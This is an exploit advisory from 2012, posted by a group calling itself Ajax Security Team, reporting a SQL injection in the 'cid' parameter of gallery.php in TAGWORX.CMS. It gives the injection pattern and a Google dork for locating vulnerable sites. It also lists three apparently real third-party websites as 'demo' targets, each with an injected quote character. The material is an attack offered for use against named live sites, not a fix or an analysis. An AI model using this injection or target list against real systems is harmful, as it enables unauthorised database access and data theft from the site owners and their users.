############################################################################ # Exploit Title: TAGWORX.CMS CMS (gallery.php) sql injection # Google Dork: "Powered by " # Date: 9/7/2012 # Author: Ajax Security Team # Discovered By: Crim3R # Home: WwW.AjaxTm.CoM # Vendor Software: http://www.jajitech.net/ # Version: All Version # Category:: webapps # Tested on: GNU/Linux Ubuntu - Windows Server - win7 ############################################################################ ================================== sqli [+] gallery.php?cid=[id][sqli]&pid=[id] D3m0: http://www.dr-schratzlseer.de/gallery.php?cid=124'&pid=124 http://www.weingut-muenchen.de/gallery.php?cat_id=17&cid='&pid=&img=1 http://www.lebenstanz.com/gallery.php?cid=124'&pid=124 ===============Crim3R@Att.Net========= [+] Greetz to All Ajaxtm Security Member Cair3x - HUrr!c4nE - E2MA3N - S3Ri0uS - iM4n - Sc0rpion - Daniyal devilzc0der - Dominator - Hossein.R1369